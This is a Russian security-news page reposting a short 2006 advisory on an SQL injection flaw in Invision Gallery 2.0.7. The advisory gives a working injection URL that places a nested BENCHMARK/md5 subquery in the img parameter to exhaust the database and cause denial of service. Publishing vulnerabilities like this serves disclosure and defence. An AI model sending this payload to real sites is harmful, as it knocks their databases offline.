Информационная безопасность

Уведомление о безопасности: Invision Gallery 2.0.7 SQL Injection Vulnerability
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] deV!L`z Clanportal - Arbitrary File Upload [061124b]

  [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490

  LifeType version 1.1.2 Multiple Path Disclosure Vulnerabilities

  Woltlab Burning Board 2.3.X XSS Vulnerability (0-Day) FIXED VERSION

From:infection_(at)_mail.kz <infection_(at)_mail.kz>
Date:1 декабря 2006 г.
Subject:Invision Gallery 2.0.7 SQL Injection Vulnerability

Invision Gallery 2.0.7

DOS attak can be performed

index.
php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&
img=111 OR id IN (SELECT
BENCHMARK(10000000,BENCHMARK(10000000,
md5(current_date))) FROM ipb_gallery_images )
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 


Rating@Mail.ru
test server